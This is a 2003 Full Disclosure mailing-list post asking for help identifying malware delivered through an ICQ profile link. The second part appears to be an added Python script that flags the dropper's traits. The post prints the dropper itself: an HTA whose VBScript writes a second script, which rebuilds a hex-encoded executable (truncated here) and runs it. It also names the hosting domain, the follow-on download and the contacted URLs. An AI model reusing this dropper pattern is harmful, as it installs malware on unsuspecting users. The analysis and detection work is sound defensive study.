Full Disclosure mailing list archives
New Virus?
From: "Michael Bemmerl" <security () astrobox net>
Date: Sat, 6 Dec 2003 00:04:23 +0100
Hi everybody!

Today I got an ICQ message from a user called "Monica" (just search on ICQ: http://people.icq.com/whitepages/search_results/1,,,00.html?FirstName=Monique&LastName=&NickName=Monica&Country=49). In her details is a URL: http://www.rsngermany.com/my_foto.htm

This is a fake 404 error page, because in the <head> tags is a link to http://www.rsngermany.com/dn2.hta :

[HTML]
[HEAD]
[TITLE]Windows Update[/TITLE]
[HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/]
[SCRIPT LANGUAGE="VBScript"]
MyFile = "q.vbs"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "WScript.Sleep(50000)" & vbcrlf
TSO.write "szBinary = szBinary & ""4D5A...snip...0000000"" & szZeroLine" & vbcrlf
TSO.write "szApplication = ""x.exe""" & vbcrlf
TSO.write "Set hFSO = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf
TSO.write "Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)" & vbcrlf
TSO.write "intLength = len(szBinary)" & vbcrlf
TSO.write "intPosition = 1" & vbcrlf
TSO.write "while intPosition [ intLength" & vbcrlf
TSO.write "char = Int(""&H"" & Mid(szBinary, intPosition, 2))" & vbcrlf
TSO.write "hFile.Write(Chr(char))" & vbcrlf
TSO.write "intPosition = intPosition+2" & vbcrlf
TSO.write "wend" & vbcrlf
TSO.write "hFile.Close" & vbcrlf
TSO.write "Set hShell=CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "hShell.run(szApplication+"" ""+szURL)" & vbcrlf
TSO.close
Set TSO = Nothing
Set FSO = Nothing
# Dim WshShell
# Set WshShell = CreateObject("WScript.Shell")
# WshShell.Run "q.vbs", 0, false
[/SCRIPT]
[script]window.close()[/script]
[/HEAD]
[/html]

The .hta creates a file named q.vbs. That creates and runs x.exe.
Notice the unset parameter szURL in q.vbs (I assume that you can specify where to download the next files; empty could mean that the files are loaded from the coded location: http://rsngermany.com).

The x.exe is FSG-packed; you can unpack it with Un-FSG! (just google for it). The file will download another exe file, disguised as a jpg: http://www.rsngermany.com/3.jpg

I tested this exe with wine; it creates two files in the windows dir.: msreg.exe and fghy.exe (again packed with FSG) and two in system32: svchostc.exe and svchosts.exe. Maybe it creates some run entries in the registry, but I couldn't test this.

And it sends requests to various domains. All requests end in 404 errors, except two (see end of list) (replace * with d and f):

comdat.de/kreta/yif.php
www.dataforcecg.com/webvision/yi*.php
www.eurostretch.ru/yi*.php
www.hhc-online.de/home/links/pics/yi*.php
www.courie.ru/style/yi*.php
mucuc.h10.ru/forum/yi*.php
www.gran-pri.ru/yi*.php
www.mir-auto.ru/yi*.php
artesproduction.com/yif.php
comdat.de/kreta/yid.php --> 301, redirection to comcat.de/kreta/zid.php
comdat.de/kreta/zid.php --> 200, just prints out your IP. Maybe the author logs infected PCs.
artesproduction.com/yid.php --> 200, again prints out the IP

The svchosts.exe has some HTTP response messages for errors 400, 502 and 503.

I tested the files with NAV2003, latest defs, no infection. Some ideas what it could be?

Greetings,
Michael

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
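As an added example (not part of Michael's post or the thread), here is a small Python triage script that flags the traits of the dropper described above: an HTA that hides its window, a script that writes a `.exe` through `Scripting.FileSystemObject`, a hex string rebuilt byte by byte with `Int("&H" & Mid(...))`, a hex blob that decodes to an `MZ` header, and a landing page that claims "404" in its body while its `<head>` references an `.hta`. The regexes and the fixtures are constructed for this example; the dropper-shaped fixture contains only a 16-byte MZ stub, not the binary from the post, and the meta-refresh used in the fake-404 fixture is an assumption about how such a page might link the `.hta`.

```python
import re
from typing import Dict, List

# Indicators derived from the dropper described in the post (constructed regexes, not a vendor signature set).
HEX_BLOB = re.compile(r'"((?:[0-9A-Fa-f]{2}){16,})"')          # quoted run of >= 16 hex bytes
HEX_TO_BYTE_LOOP = re.compile(r'Int\s*\(\s*"+&H"+\s*&\s*Mid\s*\(', re.IGNORECASE)
FSO_OBJECT = re.compile(r'Scripting\.FileSystemObject', re.IGNORECASE)
EXE_NAME = re.compile(r'"+\w+\.exe"+', re.IGNORECASE)           # quoted (or VBS double-quoted) .exe filename
SHELL_OBJECT = re.compile(r'WScript\.Shell', re.IGNORECASE)
HIDDEN_HTA = re.compile(r'SHOWINTASKBAR\s*=\s*"no"|WINDOWSTATE\s*=\s*"minimize"', re.IGNORECASE)
HTA_REF = re.compile(r'\.hta\b', re.IGNORECASE)


def find_embedded_pe(text: str) -> List[int]:
    """Return the byte lengths of quoted hex blobs that decode to a DOS/PE header ('MZ')."""
    lengths = []
    for match in HEX_BLOB.finditer(text):
        raw = bytes.fromhex(match.group(1))   # even length is guaranteed by the regex
        if raw.startswith(b"MZ"):
            lengths.append(len(raw))
    return lengths


def score_script(text: str) -> Dict[str, object]:
    """Collect dropper indicators in an HTA/VBS body; three or more is treated as suspicious."""
    findings: List[str] = []
    if find_embedded_pe(text):
        findings.append("hex-encoded PE image embedded in script")
    if HEX_TO_BYTE_LOOP.search(text):
        findings.append('hex-to-byte reconstruction loop (Int("&H" & Mid(...)))')
    if FSO_OBJECT.search(text) and EXE_NAME.search(text):
        findings.append("FileSystemObject used together with a .exe filename")
    if SHELL_OBJECT.search(text):
        findings.append("WScript.Shell instantiated (used to launch the written file)")
    if HIDDEN_HTA.search(text):
        findings.append("HTA window configured to stay hidden")
    return {"suspicious": len(findings) >= 3, "findings": findings}


def looks_like_fake_404(html: str) -> bool:
    """True when the body claims 'not found' while the <head> references an .hta."""
    body_claims_404 = re.search(r"404|not found", html, re.IGNORECASE) is not None
    head = re.search(r"<head>(.*?)</head>", html, re.IGNORECASE | re.DOTALL)
    head_has_hta = bool(head and HTA_REF.search(head.group(1)))
    return body_claims_404 and head_has_hta


# Constructed fixtures (not the sample from the post).
DROPPER_HTA = '''<HTA:APPLICATION ID="Q" SHOWINTASKBAR="no" WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
MyFile = "q.vbs"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "szBinary = szBinary & ""4D5A90000300000004000000FFFF0000"" & szZeroLine" & vbcrlf
TSO.write "szApplication = ""x.exe""" & vbcrlf
TSO.write "char = Int(""&H"" & Mid(szBinary, intPosition, 2))" & vbcrlf
TSO.write "Set hShell=CreateObject(""WScript.Shell"")" & vbcrlf
</SCRIPT>'''

BENIGN_HTA = '''<HTA:APPLICATION ID="app" APPLICATIONNAME="Notes"/>
<SCRIPT LANGUAGE="VBScript">
Set FSO = CreateObject("Scripting.FileSystemObject")
Set f = FSO.OpenTextFile("notes.txt", 1)
MsgBox f.ReadAll
</SCRIPT>'''

FAKE_404_PAGE = '''<html><head><title>Not Found</title>
<meta http-equiv="refresh" content="0;url=dn2.hta"></head>
<body><h1>404 Not Found</h1></body></html>'''

if __name__ == "__main__":
    for name, sample in (("dropper", DROPPER_HTA), ("benign", BENIGN_HTA)):
        print(name, score_script(sample))
    print("fake 404 page:", looks_like_fake_404(FAKE_404_PAGE))
```

The scoring is deliberately coarse: any one indicator (a `.exe` name, `WScript.Shell`) is common in legitimate administrative scripts, so the script only reports when several co-occur, and the `MZ` check gives a high-confidence hit on its own because a hex-encoded executable inside a script has very few benign explanations.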
Current thread:
- New Virus? Michael Bemmerl (Dec 05)
- Re: New Virus? Nick FitzGerald (Dec 05)
- Re: Re: New Virus? Michael Bemmerl (Dec 10)
- Re: New Virus? Nick FitzGerald (Dec 05)